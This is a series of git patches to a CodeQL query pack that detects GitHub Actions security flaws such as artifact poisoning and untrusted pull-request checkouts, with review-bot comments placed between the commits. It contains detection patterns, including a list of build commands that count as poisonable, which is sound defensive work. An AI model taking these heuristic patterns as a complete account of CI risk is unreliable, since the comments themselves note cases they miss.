diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 3349b5b1121..f80f09a32d8 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -19,10 +19,11 @@ class DangerousActionUsesStep extends PoisonableStep, UsesStep { private string dangerousCommands() { result = [ - "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar " + "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", + "poetry run" ] } From 4b4901f99f5c16ee1510ad16598a70b667ff875d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:46 +0200 Subject: [PATCH 0337/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6a247cee330..33c43429bd6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.0 +version: 0.1.1 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 05f3408c578..75624d6f199 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.0 +version: 0.1.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From bdaab69d0bb098395107c6300998c2d128c3e5e2 Mon Sep 17 00:00:00 2001 
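Review bot: `dangerousCommands()` in `PoisonableSteps.qll` now mixes three conventions: regex terminators (`"npm i(nstall)?(\\b|$)"`), a trailing space (`"npm run "`), and bare text (`"poetry install"`, `"poetry run"`), and nothing states that the entries are regular-expression fragments. How the strings are matched is outside the hunk, but the `(\\b|$)` and `^ant ` entries suggest regex use, in which case a future entry containing `.` or `+` would match more than intended. I would add a QLDoc line above the predicate, `/** Gets a regular-expression fragment for a command treated as poisonable; metacharacters must be escaped. */`, and terminate the new entries like their neighbours: `"poetry install(\\b|$)"`, `"poetry run "`.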
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 15:09:37 +0200 Subject: [PATCH 0338/1267] Do not uses globs for source-root --- .github/action/dist/index.js | 1 - .github/action/src/codeql.ts | 1 - 2 files changed, 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 24092120560..7bb3039fe48 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,7 +28684,6 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index fe2f9b49029..08c4b420a4c 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,7 +121,6 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From 1fdf76ac4116b6089f17c88a16ddbe2b7bd9bce5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 15:17:46 +0200 Subject: [PATCH 0339/1267] Improve download artifact and untrusted checkout queries --- .../security/ArtifactPoisoningQuery.qll | 32 +++++++++++++------ .../security/UntrustedCheckoutQuery.qll | 19 +++++------ 2 files changed, 33 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 060471bb5dc..44c3c64a5a6 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -16,19 +16,33 @@ abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); } +class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { + GitHubDownloadArtifactActionStep() { + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getCallee() = "actions/download-artifact" and + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + } + + override string getPath() { + if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + } +} + class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { DownloadArtifactActionStep() { this.getCallee() = [ - "actions/download-artifact", "dawidd6/action-download-artifact", - "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", - "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", - "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", - "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", - "nmerget/download-gzip-artifact", "benday-inc/download-artifact", - "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", - "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", - "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" + "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", + "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", + "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", + "aochmann/actions-download-artifact", 
"cytopia/download-artifact-retry-action", + "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", + "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", + "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", + "ma-ve/action-download-artifact-with-retry" ] and ( not exists(this.getArgument(["branch", "branch_name"])) or diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ba31b0de500..a9c92e70ee5 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -93,7 +93,11 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt // 3rd party actions returning the PR head sha/ref exists(UsesStep step | ( - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and // TODO: This should be read step of the head_sha or head_ref output vars this.getArgument("ref").matches("%.head_ref%") or @@ -229,10 +233,10 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { /** An If node that contains an actor, user or label check */ abstract class ControlCheck extends If { predicate dominates(Step step) { - step.getIf() = this or + step.getIf() = this or step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this } } 
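Review bot: In the new `GitHubDownloadArtifactActionStep` (the `@@ -16,19 +16,33 @@` hunk of `ArtifactPoisoningQuery.qll`), the `run-id` test `matches("%github.event.workflow_run.id%")` only recognises workflows that write that expression directly into the input. A run id passed through an `env` variable, a step output or a workflow input would not be flagged, so cross-run downloads can be missed. Either relax the condition to any `run-id` that is not the current run, or document the limitation next to the check, e.g. `// only the literal github.event.workflow_run.id expression is recognised; indirect run ids are not tracked`. Separately, `getPath()` returns `""` when `path` is absent; a short comment saying that the empty string presumably stands for the action's default download location would help readers of the path checks, which are outside this hunk.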
@@ -259,7 +263,7 @@ class ActorControlCheck extends ControlCheck { .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", ], _, _) ) } @@ -270,10 +274,7 @@ class RepositoryControlCheck extends ControlCheck { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.repository\\b", - "\\bgithub\\.repository_owner\\b", - ], _, _) + .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) ) } } From c764b39c1842b433d043bb9c2b974e8abe46861a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 17:11:10 +0200 Subject: [PATCH 0340/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 33c43429bd6..10d9eeddcf7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.1 +version: 0.1.2 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 75624d6f199..16bad7c15bd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.1 +version: 0.1.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4619128c11ea18a55b04d9583e80fa16f2d6c66a Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 20 Jun 2024 09:50:36 +0200 Subject: [PATCH 0341/1267] Move from githubsecuritylab packages to github --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 ++-- ql/lib/ext/amannn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- ql/lib/ext/andresz1_size-limit-action.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 2 +- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- .../ext/ashley-taylor_read-json-property-action.model.yml | 2 +- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 2 +- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- .../ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- ql/lib/ext/blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/changesets_action.model.yml | 2 +- ql/lib/ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 2 +- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/cycjimmy_semantic-release-action.model.yml | 
2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ql/lib/ext/dailydotdev_action-devcard.model.yml | 2 +- .../danielpalme_reportgenerator-github-action.model.yml | 2 +- ql/lib/ext/daspn_private-actions-checkout.model.yml | 2 +- ql/lib/ext/dawidd6_action-ansible-playbook.model.yml | 2 +- ql/lib/ext/dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- .../determinatesystems_magic-nix-cache-action.model.yml | 2 +- ql/lib/ext/docker-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- .../ext/firebaseextended_action-hosting-deploy.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml | 2 +- .../actions_actions-runner-controller.model.yml | 2 +- .../ext/generated/composite-actions/adap_flower.model.yml | 2 +- .../composite-actions/agoric_agoric-sdk.model.yml | 2 +- .../composite-actions/airbnb_lottie-ios.model.yml | 2 +- .../composite-actions/airbytehq_airbyte.model.yml | 2 +- .../composite-actions/amazon-ion_ion-java.model.yml | 2 +- .../generated/composite-actions/anchore_grype.model.yml | 2 +- .../generated/composite-actions/anchore_syft.model.yml | 2 +- .../composite-actions/angular_dev-infra.model.yml | 2 +- .../composite-actions/ansible_ansible-lint.model.yml | 2 +- .../ext/generated/composite-actions/ansible_awx.model.yml | 2 +- .../composite-actions/apache_arrow-datafusion.model.yml | 2 +- .../generated/composite-actions/apache_arrow-rs.model.yml | 2 +- .../generated/composite-actions/apache_arrow.model.yml | 2 +- .../composite-actions/apache_bookkeeper.model.yml | 2 +- 
.../ext/generated/composite-actions/apache_brpc.model.yml | 2 +- .../generated/composite-actions/apache_camel-k.model.yml | 2 +- .../generated/composite-actions/apache_camel.model.yml | 2 +- .../generated/composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../generated/composite-actions/apache_nuttx.model.yml | 2 +- .../generated/composite-actions/apache_opendal.model.yml | 2 +- .../generated/composite-actions/apache_pekko.model.yml | 2 +- .../composite-actions/apache_pulsar-helm-chart.model.yml | 2 +- .../generated/composite-actions/apache_superset.model.yml | 2 +- .../composite-actions/appflowy-io_appflowy.model.yml | 2 +- .../composite-actions/aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../composite-actions/armadaproject_armada.model.yml | 2 +- .../generated/composite-actions/armbian_build.model.yml | 2 +- .../composite-actions/auth0_auth0-java.model.yml | 2 +- .../generated/composite-actions/auth0_auth0.net.model.yml | 2 +- .../composite-actions/auth0_auth0.swift.model.yml | 2 +- .../composite-actions/autogluon_autogluon.model.yml | 2 +- .../generated/composite-actions/avaiga_taipy.model.yml | 2 +- .../composite-actions/aws-amplify_amplify-cli.model.yml | 2 +- .../aws-powertools_powertools-lambda-python.model.yml | 2 +- .../composite-actions/aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../composite-actions/awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../composite-actions/azure_azure-datafactory.model.yml | 2 +- .../generated/composite-actions/badges_shields.model.yml | 2 +- .../composite-actions/balena-io_etcher.model.yml | 2 +- .../composite-actions/balena-os_balena-engine.model.yml | 2 +- .../composite-actions/ben-manes_caffeine.model.yml | 2 +- .../ext/generated/composite-actions/bokeh_bokeh.model.yml | 2 +- 
.../composite-actions/botpress_botpress.model.yml | 2 +- .../braintree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../composite-actions/broadinstitute_gatk.model.yml | 2 +- .../composite-actions/canonical_multipass.model.yml | 2 +- .../composite-actions/chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../composite-actions/chipsalliance_chisel.model.yml | 2 +- .../composite-actions/chocobozzz_peertube.model.yml | 2 +- .../composite-actions/cilium_cilium-cli.model.yml | 2 +- .../generated/composite-actions/cilium_cilium.model.yml | 2 +- .../generated/composite-actions/citusdata_citus.model.yml | 2 +- .../composite-actions/clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../composite-actions/cloudflare_workers-sdk.model.yml | 2 +- .../cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../ext/generated/composite-actions/coder_coder.model.yml | 2 +- .../generated/composite-actions/coil-kt_coil.model.yml | 2 +- .../composite-actions/commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../composite-actions/corretto_corretto-8.model.yml | 2 +- .../composite-actions/cosmos_cosmos-sdk.model.yml | 2 +- .../generated/composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../ext/generated/composite-actions/cvc5_cvc5.model.yml | 2 +- .../generated/composite-actions/d2l-ai_d2l-en.model.yml | 2 +- .../danysk_build-check-deploy-gradle-action.model.yml | 2 +- .../composite-actions/datadog_dd-trace-dotnet.model.yml | 2 +- .../composite-actions/datadog_dd-trace-go.model.yml | 2 +- .../composite-actions/datadog_dd-trace-js.model.yml | 2 +- .../composite-actions/datafuselabs_databend.model.yml | 2 +- .../generated/composite-actions/davatorium_rofi.model.yml | 2 +- .../composite-actions/debezium_debezium.model.yml | 2 +- .../composite-actions/defenseunicorns_zarf.model.yml | 2 +- 
...marches-simplifiees_demarches-simplifiees.fr.model.yml | 2 +- .../department-of-veterans-affairs_vets-website.model.yml | 2 +- .../composite-actions/devexpress_devextreme.model.yml | 2 +- .../generated/composite-actions/diggerhq_digger.model.yml | 2 +- .../generated/composite-actions/diku-dk_futhark.model.yml | 2 +- .../composite-actions/discourse_.github.model.yml | 2 +- .../generated/composite-actions/dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../composite-actions/dotnet_docs-tools.model.yml | 2 +- .../composite-actions/dotnet_dotnet-monitor.model.yml | 2 +- .../composite-actions/dragonflydb_dragonfly.model.yml | 2 +- .../composite-actions/drawpile_drawpile.model.yml | 2 +- .../composite-actions/eksctl-io_eksctl.model.yml | 2 +- .../composite-actions/elastic_apm-agent-dotnet.model.yml | 2 +- .../composite-actions/elastic_apm-agent-java.model.yml | 2 +- .../composite-actions/elastic_apm-server.model copy.yml | 2 +- .../composite-actions/elementor_elementor.model.yml | 2 +- .../generated/composite-actions/emberjs_data.model.yml | 2 +- .../ext/generated/composite-actions/emqx_emqx.model.yml | 2 +- .../composite-actions/eonasdan_tempus-dominus.model.yml | 2 +- .../ext/generated/composite-actions/erlang_otp.model.yml | 2 +- .../generated/composite-actions/esphome_esphome.model.yml | 2 +- .../generated/composite-actions/expensify_app.model.yml | 2 +- .../ext/generated/composite-actions/expo_expo.model.yml | 2 +- .../composite-actions/expo_vscode-expo.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../generated/composite-actions/facebook_buck2.model.yml | 2 +- .../generated/composite-actions/facebook_flow.model.yml | 2 +- .../generated/composite-actions/facebook_yoga.model.yml | 2 +- .../composite-actions/facebookresearch_xformers.model.yml | 2 +- .../composite-actions/fastly_compute-actions.model.yml | 2 +- .../generated/composite-actions/felangel_bloc.model.yml | 2 +- 
.../composite-actions/firebase_firebase-ios-sdk.model.yml | 2 +- .../composite-actions/flagsmith_flagsmith.model.yml | 2 +- .../composite-actions/flaxengine_flaxengine.model.yml | 2 +- .../flipperdevices_flipperzero-firmware.model.yml | 2 +- .../generated/composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../generated/composite-actions/fossasia_visdom.model.yml | 2 +- .../composite-actions/freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../generated/composite-actions/gaphor_gaphor.model.yml | 2 +- .../composite-actions/getsentry_action-release.model.yml | 2 +- .../composite-actions/github_codeql-action.model.yml | 2 +- .../ext/generated/composite-actions/github_ruby.model.yml | 2 +- .../composite-actions/gittools_gitversion.model.yml | 2 +- .../composite-actions/go-spatial_tegola.model.yml | 2 +- .../composite-actions/goauthentik_authentik.model.yml | 2 +- .../composite-actions/godotengine_godot.model.yml | 2 +- .../generated/composite-actions/google_dagger.model.yml | 2 +- .../composite-actions/googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- .../googlecloudplatform_dataflowtemplates.model.yml | 4 ++-- .../googlecloudplatform_magic-modules.model.yml | 2 +- .../composite-actions/gravitational_teleport.model.yml | 2 +- .../composite-actions/grote_transportr.model.yml | 2 +- .../generated/composite-actions/hashicorp_nomad.model.yml | 2 +- .../composite-actions/hashicorp_terraform.model.yml | 2 +- .../generated/composite-actions/hashicorp_vault.model.yml | 4 ++-- .../composite-actions/home-assistant_android.model.yml | 2 +- .../composite-actions/homebrew_actions.model.yml | 2 +- .../hyperledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../composite-actions/igniterealtime_openfire.model.yml | 2 +- .../composite-actions/infracost_actions.model.yml | 2 +- 
.../inspektor-gadget_inspektor-gadget.model.yml | 2 +- .../composite-actions/intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../composite-actions/ionic-team_ionicons.model.yml | 2 +- .../composite-actions/ionic-team_stencil.model.yml | 2 +- .../ext/generated/composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../composite-actions/jsocol_django-ratelimit.model.yml | 2 +- .../composite-actions/juicedata_juicefs.model.yml | 2 +- .../composite-actions/jupyter_docker-stacks.model.yml | 2 +- .../composite-actions/keycloak_keycloak.model.yml | 2 +- .../generated/composite-actions/kserve_kserve.model.yml | 2 +- .../generated/composite-actions/kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../composite-actions/kubernetes-sigs_karpenter.model.yml | 2 +- .../composite-actions/kubernetes-sigs_kwok.model.yml | 2 +- .../composite-actions/kubescape_kubescape.model.yml | 2 +- .../composite-actions/kubeshop_botkube.model.yml | 2 +- .../generated/composite-actions/kyverno_kyverno.model.yml | 2 +- .../generated/composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../composite-actions/ldc-developers_ldc.model.yml | 2 +- .../composite-actions/ledgerhq_ledger-live.model.yml | 2 +- .../ext/generated/composite-actions/lerna_lerna.model.yml | 2 +- .../ext/generated/composite-actions/lf-edge_eve.model.yml | 2 +- .../generated/composite-actions/libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../composite-actions/lightning-ai_torchmetrics.model.yml | 2 +- .../composite-actions/linkerd_linkerd2.model.yml | 4 ++-- .../composite-actions/logseq_publish-spa.model.yml | 2 +- .../composite-actions/macvim-dev_macvim.model.yml | 2 +- .../generated/composite-actions/mamba-org_mamba.model.yml | 2 +- 
.../composite-actions/maplibre_maplibre-native.model.yml | 2 +- .../composite-actions/mastodon_mastodon.model.yml | 2 +- .../composite-actions/mavlink_qgroundcontrol.model.yml | 2 +- .../composite-actions/mdanalysis_mdanalysis.model.yml | 2 +- .../generated/composite-actions/medic_cht-core.model.yml | 2 +- .../generated/composite-actions/medusajs_medusa.model.yml | 2 +- .../composite-actions/metabase_metabase.model.yml | 2 +- .../metamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../composite-actions/microsoft_fluentui.model.yml | 2 +- .../composite-actions/microsoft_playwright.model.yml | 2 +- .../generated/composite-actions/microsoft_wsl.model.yml | 2 +- .../composite-actions/milvus-io_milvus.model.yml | 2 +- .../generated/composite-actions/mlflow_mlflow.model.yml | 2 +- .../composite-actions/modin-project_modin.model.yml | 2 +- .../composite-actions/mozilla_addons-server.model.yml | 2 +- .../generated/composite-actions/mozilla_bedrock.model.yml | 2 +- .../generated/composite-actions/mozilla_sccache.model.yml | 2 +- .../composite-actions/msys2_setup-msys2.model.yml | 2 +- .../composite-actions/mumble-voip_mumble.model.yml | 2 +- .../ext/generated/composite-actions/nasa_fprime.model.yml | 2 +- .../composite-actions/nats-io_nats-server.model.yml | 2 +- ...form-actions_optic-release-automation-action.model.yml | 2 +- .../ext/generated/composite-actions/nektos_act.model.yml | 2 +- .../neo4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../composite-actions/neondatabase_neon.model.yml | 2 +- .../generated/composite-actions/neovim_neovim.model.yml | 2 +- .../ext/generated/composite-actions/nhost_nhost.model.yml | 2 +- .../composite-actions/nix-community_nixos-wsl.model.yml | 2 +- .../ext/generated/composite-actions/novuhq_novu.model.yml | 4 ++-- .../ext/generated/composite-actions/nymtech_nym.model.yml | 2 +- .../composite-actions/obsproject_obs-studio.model.yml | 2 +- 
.../ext/generated/composite-actions/ocaml_dune.model.yml | 2 +- .../composite-actions/oneflow-inc_oneflow.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../ext/generated/composite-actions/openjdk_jdk.model.yml | 2 +- .../opensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../composite-actions/opentrons_opentrons.model.yml | 2 +- .../composite-actions/openvinotoolkit_openvino.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts-upgradeable.model.yml | 2 +- .../openzeppelin_openzeppelin-contracts.model.yml | 2 +- .../ext/generated/composite-actions/oppia_oppia.model.yml | 2 +- .../generated/composite-actions/oracle_graal.model.yml | 2 +- .../composite-actions/oracle_truffleruby.model.yml | 2 +- .../generated/composite-actions/orhun_git-cliff.model.yml | 2 +- .../ext/generated/composite-actions/oven-sh_bun.model.yml | 2 +- .../composite-actions/owntracks_android.model.yml | 2 +- .../composite-actions/pandas-dev_pandas.model.yml | 2 +- .../composite-actions/pardeike_harmony.model.yml | 2 +- .../composite-actions/pennylaneai_pennylane.model.yml | 2 +- .../composite-actions/phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../ext/generated/composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/composite-actions/pixijs_pixijs.model.yml | 2 +- .../generated/composite-actions/posthog_posthog.model.yml | 2 +- .../generated/composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../composite-actions/projectnessie_nessie.model.yml | 2 +- .../ext/generated/composite-actions/psf_black.model.yml | 2 +- .../composite-actions/pyca_cryptography.model.yml | 2 
+- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../composite-actions/python-poetry_poetry.model.yml | 2 +- .../ext/generated/composite-actions/python_mypy.model.yml | 2 +- .../composite-actions/quarto-dev_quarto-cli.model.yml | 2 +- .../ext/generated/composite-actions/quay_clair.model.yml | 2 +- .../composite-actions/quickwit-oss_quickwit.model.yml | 2 +- .../generated/composite-actions/r-lib_actions.model.yml | 2 +- .../generated/composite-actions/randombit_botan.model.yml | 2 +- .../composite-actions/raspberrypi_documentation.model.yml | 2 +- .../composite-actions/ray-project_kuberay.model.yml | 2 +- .../composite-actions/readthedocs_actions.model.yml | 2 +- .../composite-actions/reflex-dev_reflex.model.yml | 2 +- .../composite-actions/renovatebot_renovate.model.yml | 2 +- .../composite-actions/rethinkdb_rethinkdb.model.yml | 2 +- .../ext/generated/composite-actions/risc0_risc0.model.yml | 2 +- .../composite-actions/rocketchat_rocket.chat.model.yml | 2 +- .../ext/generated/composite-actions/rook_rook.model.yml | 2 +- .../generated/composite-actions/roots_trellis.model.yml | 2 +- .../ext/generated/composite-actions/ruby_debug.model.yml | 2 +- .../ext/generated/composite-actions/ruby_ruby.model.yml | 2 +- .../generated/composite-actions/rusefi_rusefi.model.yml | 2 +- .../generated/composite-actions/saltstack_salt.model.yml | 2 +- ql/lib/ext/generated/composite-actions/saltstack_salt.yml | 2 +- .../generated/composite-actions/sap_sapmachine.model.yml | 2 +- .../composite-actions/scala-native_scala-native.model.yml | 2 +- .../generated/composite-actions/scitools_iris.model.yml | 2 +- .../composite-actions/scylladb_scylla-operator.model.yml | 2 +- .../composite-actions/shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- 